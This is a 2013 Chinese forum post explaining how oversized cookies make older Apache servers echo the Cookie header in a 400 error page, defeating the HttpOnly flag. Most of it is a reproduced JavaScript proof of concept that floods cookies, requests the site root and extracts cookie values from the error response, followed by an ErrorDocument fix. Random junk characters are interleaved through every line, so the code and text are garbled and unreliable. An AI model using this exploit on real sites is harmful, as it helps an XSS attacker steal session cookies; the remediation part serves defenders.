很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。: B' C% _" i7 ]3 r# g
1 j) Q& q! f" S: v1 U用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
9 n# w8 A4 ^8 O* t8 y+ b: Y # n; e9 u) m3 B. J5 W. N
0 P& f d; S& Q& V// http://www.exploit-db.com/exploits/18442/
' a+ u' M2 F0 y# n: } qfunction setCookies (good) {) K: g( Y4 o7 j* c; D
// Construct string for cookie value
7 H! M0 z; e r1 j: \var str = "";
/ B8 r1 H! F" v: w: s! Ffor (var i=0; i< 819; i++) {" {& U9 o3 Y& ]7 }: c
str += "x";
! {! h) O, F& M4 _}
( B0 v2 k+ x- l6 `0 R& j// Set cookies0 J% O1 p% j" K$ e
for (i = 0; i < 10; i++) {
9 M# s" D S1 j& ~; v8 p% c; m0 l// Expire evil cookie
9 O# P( I' W" P& H) `+ V1 Qif (good) {* R- I% L3 q) @0 \" X
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";$ C2 r& H# L% c9 |. g$ k) s
}
2 ~1 Y$ ?$ p: b// Set evil cookie
; W3 U/ f/ }) f7 W9 selse {; a A, {$ u% B" X% ^! Y3 E
var cookie = "xss"+i+"="+str+";path=/";* w1 M2 Y A8 \6 X
}* N0 x# E3 \0 u: |' h/ g' P& V
document.cookie = cookie;
& E9 W: X5 @" p! L! e% y}/ t) g$ ^! o" v
}
* @0 a4 g* E7 `9 D6 A& W Z& Tfunction makeRequest() {
& K$ @( K8 O* t: B4 C* L. i! x0 U- ?setCookies();
7 r2 F9 T6 `# p5 x7 M* p1 xfunction parseCookies () {7 a) _# f5 j ~
var cookie_dict = {}; P8 d( ?* R! f
// Only react on 400 status
% d( n) T7 D6 E0 @2 e2 N, Cif (xhr.readyState === 4 && xhr.status === 400) {
( d B9 _) m$ S& W# J+ D// Replace newlines and match <pre> content& A7 t& g% B/ f* z4 _6 k. x
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
) X. _; x8 `* `" @9 G m/ x8 R: r- ?- Qif (content.length) {8 }3 P( H7 u Y4 b
// Remove Cookie: prefix
. v% l/ J g* a2 _, o/ _content = content[1].replace("Cookie: ", "");
2 P2 K* E, R' I# e- v# Fvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);: ]5 g: W6 A {5 I
// Add cookies to object, I: _# u2 n3 E1 r* v. L. r( ^6 }
for (var i=0; i<cookies.length; i++) {
5 W; R. |1 x% Uvar s_c = cookies.split('=',2);! t! R. W; a K) O/ `* `7 B3 ?
cookie_dict[s_c[0]] = s_c[1];
1 E! a$ S( J0 `- X6 A}
! t$ T9 k6 F) y/ e}
% ^0 I! N. z- U- W% W// Unset malicious cookies H5 c2 h) D8 B& h8 p
setCookies(true);
6 H) G* l: s" J, S0 kalert(JSON.stringify(cookie_dict));
2 T |% n S5 p}1 ]9 k: Y9 K9 Z- q
}
! P5 E6 w* l. A. j// Make XHR request
0 r* s1 v8 F: q0 qvar xhr = new XMLHttpRequest();
/ q" s1 ]: D' C* O2 h# axhr.onreadystatechange = parseCookies;
' n" m- F& ^7 ?$ `# fxhr.open("GET", "/", true);# D0 [' q8 p- a* \
xhr.send(null);
9 q. Q3 _% m6 ]. T1 p6 O} E9 G; o& K0 Y) J) @
makeRequest();
0 U9 K) i9 b# ^( u& x; F1 y. e6 ]4 w5 Q, F
你就能看见华丽丽的400错误包含着cookie信息。
* h' l% X T& y( |
$ g' V+ h+ u% W9 U( |; I8 k下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
8 S+ F7 C# r% C& E6 r3 w8 W n I& M' g* v% T( P$ z& x1 A
修复方案:; g* w. ~0 W# ~1 r: J$ V: q4 \
U6 G2 t- F5 A k# \
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
# `& M. n9 ]) @& z8 r
' y7 }6 ]2 A2 ^8 G- A) ^In the event of a problem or error, Apachecan be configured to do one of four things,9 X- g7 H F: o9 H* |; T
# f4 b5 }: K4 J8 u1 e1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
4 v! J# \$ p( U/ s3 O; M# C# t2. output acustomized message输出一段信息
0 U3 G" `9 J2 t; Y* E% j3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 u; G9 x: O0 d1 {# @8 [' r
4. redirect to an external URL to handle theproblem/error转向一个外部URL, L% ~6 w; H8 M `2 @
% @" a) K* ^) R经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
+ t9 @, x9 |) x7 ~8 z. |8 |; r
* j' g- O! l- Q, M0 jApache配置:
K4 H* y! |- l8 a% q5 _7 x! w: c P3 j2 x* w% U- a& \6 F
ErrorDocument400 " security test"
- t0 W2 m( _$ Z$ f+ S6 M1 h
3 _. [7 B" Q3 ^) {当然,升级apache到最新也可:)。
! {1 q1 F: _& R- R! V8 e" S$ Q9 {/ a, z1 Y, n2 h! u# m6 H
参考:http://httpd.apache.org/security/vulnerabilities_22.html
( k$ G8 t0 d4 C: i U7 z! Z7 Y Z% a% `- F; o
|
发表于 2013-4-19 19:15:43
收藏
支持
反对